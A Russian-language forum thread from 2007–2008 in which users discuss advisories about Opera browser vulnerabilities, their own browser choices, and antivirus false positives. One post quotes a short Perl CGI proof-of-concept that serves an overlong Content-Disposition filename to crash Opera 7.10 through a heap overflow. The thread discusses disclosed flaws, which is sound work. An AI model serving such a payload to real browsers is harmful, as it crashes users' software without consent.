Guns.ru Talks
Компьютеры и программы
Множественные уязвимости в Opera

тема закрыта

Знакомства | вход | зарегистрироваться | поиск | картинки | календарь | поиск оружия, магазинов | фотоконкурсы | Аукцион

Множественные уязвимости в Opera

Trogloditus
P.M.
25-12-2007 02:53 Trogloditus
Opera 5.x
Opera 6.x
Opera 7.x
Opera 8.x
Opera 9.x

Найденные уязвимости позволяют удаленному злоумышленнику осуществить XSS атаку, получить доступ к конфиденциальной информации и выполнить произвольный код на целевой системе.

1) Уязвимость возникает из-за ошибки в проверке входных данных. Атакующий может совершить XSS нападение на целевую систему.

2) Уязвимость возникает из-за ошибки в проверке входных данных при обработке TLS сертификатов. Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода.

3) Уязвимость возникает из-за ошибки в редактировании текста Rich при использовании режима designMode. Атакующий может совершить XSS нападение на целевую систему.

4) Уязвимость возникает из-за ошибки в проверке входных данных при обработке растровых графических изображений. Атакующий может получить доступ к содержимому произвольных участков памяти.

------
Nascentes morimur.

NE
P.M.
25-12-2007 03:00 NE
А где их нет? Этих уязвимостей?
Я вот по совету некоторых участников с этого форума использую OPERA, + работаю под учетной записью пользователя. И ещё ни одна дрянь с просторов сети ко мне не прицепилась.
Под учетной записью админа, да с включенным антивирем всё было гораздо хуже.. .
Trogloditus
P.M.
25-12-2007 03:25 Trogloditus
А где их нет? Этих уязвимостей?

Хороший вопрос...


http://ssh.com/

Alextrop
P.M.
25-12-2007 04:25 Alextrop
Я например как только перешел на Оперу избавился от вирусов которые лезли через браузер. с IE запарился просто. И панельки ещё сами ставились какие то. А тут всё просто и надёжно.
А кто нашел уязвимости?
Trogloditus
P.M.
25-12-2007 05:20 Trogloditus
А кто нашел уязвимости?


Крис Касперский

John JACK
P.M.
25-12-2007 05:28 John JACK
Сижу в Мозилле, пароль рута не скажу никому, ssh отключен принципиально.. . Какие-такие вирусы?
Зы. С яндекс-баром, яндекс-блэкджэком и яндекс-шлюхами
Trogloditus
P.M.
25-12-2007 18:37 Trogloditus
ssh отключен принципиально...


Не подскажите, как возможно отключить SSH порт?

John JACK
P.M.
25-12-2007 19:11 John JACK
Убрать запуск службы из /etc/rc2.d/ ?
CAV
P.M.
26-12-2007 14:55 CAV
Ну касперский еще не то может найти (к примеру недавняя хохма про определение IE как вирус и удаление его (после обновление KAV 7)). Сам сижу под фоксом... . зверья нет
badydoc
P.M.
26-12-2007 15:20 badydoc
Originally posted by CAV:

определение IE как вирус


дык может и правда вирус подменил или модифицировал ie.exe
ober
P.M.
27-12-2007 18:34 ober
еще каспер explorer.exe определил как вирь, со всеми вытекающими
Trogloditus
P.M.
28-12-2007 16:24 Trogloditus
Вот еще по теме:


Отказ в обслуживании обнаружен в Opera. Удаленный сервер может аварийно завершить работу браузера во время загрузки файла.

Переполнение буфера существует в обработке имени файла в процессе загрузки файла. Длинное имя файла приведет к аварийному завершению работы браузера.

Пример:

#!/usr/bin/perl
# Smash Heap Memory.
# This script is CGI program.
$ =1;
my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);
print "Content-type: text/html\r\n";
print qq~Content-Disposition: filename="$filename"\r\n~;
print "\r\n";
print "<html><body>Love & Peace </body></html>\r\n";

Уязвимость обнаружена в Opera Web Browser 7.10 build 2840 и более ранних версиях.

badydoc
P.M.
28-12-2007 17:39 badydoc
Originally posted by Trogloditus:

и более ранних версиях


сейчас 9.25 версия билд 8827 уже доступна, таким старьем как 7-я врятли кто-то пользуется
Manowar
P.M.
29-12-2007 16:00 Manowar
пока в 9.хх не починят RSS я ей пользовацца не буду.
Привык Башорг читать как ленту
spec
P.M.
30-12-2007 22:09 spec
Originally posted by ober:
еще каспер explorer.exe определил как вирь, со всеми вытекающими

Ничего особенного - я в период увлечением Делфой замечал, что любые мои программульки, даже если там обращений к файловой системе не было, частенько эверистикой обзывались злобными вирусами и удалялись. Наверное, просто тупо из-за обращений к динамоческой памяти в коде.
Да что там, когда то надо было на пустом компе с диал-апом математическую прогу малюсенькую накидать (оптимизация на 3 параметра), залил обычный Бесик (не Визуал) с компиллятором, закомпилил в exeшник - тоже как вирус определил.
До сих пор не понимаю, по какому принципу.

андроныч
P.M.
31-12-2007 12:42 андроныч
опера форева
MukpockoTT
P.M.
4-1-2008 17:23 MukpockoTT
Каспер шибко резвый. А вот Аваст у меня нашел пару троянов, коих Каспер не видел.. .
>
Guns.ru Talks
Компьютеры и программы
Множественные уязвимости в Opera